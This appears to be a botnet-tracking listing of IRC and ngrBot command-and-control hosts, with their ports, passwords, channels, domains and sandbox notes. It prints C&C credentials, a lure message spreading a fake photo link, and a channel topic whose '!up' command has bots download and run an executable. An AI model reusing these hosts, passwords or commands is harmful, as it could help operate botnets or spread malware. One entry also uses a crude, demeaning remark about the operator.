Remote Host Port Number 173.255.237.110 80 199.15.234.7 80 76.73.3.162 80 61.31.99.67 1863 PASS boss 61.31.99.67 4042 PASS boss NICK [USA|00||324811] USER xp-2815 * 0 :COMPUTERNAME MODE [USA|00||324811] -ix JOIN #new PRIVMSG #new : Now talking in #new Topic On: [ #new ] [ ] Topic By: [ chk ] hosting infos: http://whois.domaintools.com/61.31.99.67
46.105.232.106(irc botnet hosted in Ireland Ovh Systems)
Remote Host Port Number 46.105.232.106 1866 NICK n[USA|XP|COMPUTERNAME]pzammgy USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ ] Topic By: [ xx ] hosting infos: http://whois.domaintools.com/46.105.232.106
c4t3ring.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)
Domains used to control bots: pedoapestoso.info not active c4t3ring.info ramen4all.info Resolved : [c4t3ring.info] To [74.62.152.211] Resolved : [ramen4all.info] To [74.62.152.211] c4t3ring.info:6161 Botnet server here ramen4all.info:6161 Botnet server here Clients: I have 247 clients and 0 servers Local users: Current Local Users: 247 Max: 1261 Global users: Current Global Users: 247 Max: 280 PASS p3p1n0 NICKRead more...
rlz1lola.info(ngrBot hosted in Germany Hetzner Online Ag)
Large ngrBot server hosted in Germany Here u have strings from 2 executable samples 30upjmrlzz.exe Processes: PID ParentPID User Path -------------------------------------------------- 2872 1236 C:Documents and SettingsMes documents30upjmrlzz.exe Ports: Port PID Type Path -------------------------------------------------- Explorer Dlls: DLL Path Company Name File Description -------------------------------------------------- No changes Found IE Dlls: DLL Path Company Name File Description -------------------------------------------------- NoRead more...
31.31.76.89(irc botnet hosted in Czech Republic Wedos Internet A.s)
Remote Host Port Number 31.31.76.89 6667 PONG :A55A8CFA JOIN #blackout Now talking in #blackout Topic On: [ #blackout ] [ #blackout ] Topic By: [ JohnDoe ] Modes On: [ #blackout ] [ +sntru ] hosting infos: http://whois.domaintools.com/31.31.76.89
46.166.162.116(irc botnet hosted in United Kingdom Santrex Internet Services Ltd)
46.166.162.116:8585 nick yycIaIc user yudtouga channel #c Now talking in #c Topic On: [ #c ] [=b0ys1Gs9MhP2M38/SRY5UVNKt93lIg63DZ6HazYwEbYQAc+LvQLYRMp52xSH5wHeVdrdItvhP07jOf90YyPCLKO3nTZlyMhqT7MEydvpWg8CFUZL4zUDDT0xS+sjMxF90f9dpeF ] Topic By: [ rise ] hosting infos: http://whois.domaintools.com/46.166.162.116
pool.dload.asia(Bitcoin Miner Botnet hosted in France Paris Gandi)
Very big net here the gay behind the net is making alot of money from infected machines Resolved : [pool.dload.asia] To [95.142.174.210] Resolved : [pool.dload.asia] To [92.243.3.252] Resolved : [pool.dload.asia] To [95.142.175.27] Resolved : [pool.dload.asia] To [95.142.161.74] Resolved : [pool.dload.asia] To [95.142.174.205] Resolved : [pool.dload.asia] To [95.142.170.142] Resolved : [pool.dload.asia] To [95.142.174.64] Resolved : [pool.dload.asia]Read more...
sukipuki4mokimoki.in(winlocker hosted in United States Clarks Summit Volumedrive)
HTTP Query Text sukipuki4mokimoki.in GET /winlocker/1.bmp HTTP/1.1 sukipuki4mokimoki.in GET /winlocker/2.bmp HTTP/1.1 Suspicious Actions Detected Copies self to other locations Creates autorun records Injects code into other processes exe file Download Download hosting infos: http://whois.domaintools.com/199.168.139.53
74.63.232.209(ngrBot hosted in United States New York Limestone Networks Inc)
Remote Host Port Number 199.15.234.7 80 203.249.66.5 80 74.63.232.209 5236 PASS ROCKR PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD |” PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto de jlo desnuda http://noticiasyfarandula.com/IMG00359268.JPG mamacita XD” PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – RedirectedRead more...
ch1mb4.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)
Resolved : [ch1mb4.info] To [74.62.155.207] C&C Server: 74.62.155.207:6060 Server Password: Username: uamethp Nickname: n{DE|XPa}uamethp Channel: #hell (Password: secret) Channeltopic: :!up http://iccperu.com/new.exe 4bbed3842486716553a21477e44fc2ff !mdns http://aniavillegasperu.com/js.txt hosting infos: http://whois.domaintools.com/74.62.155.207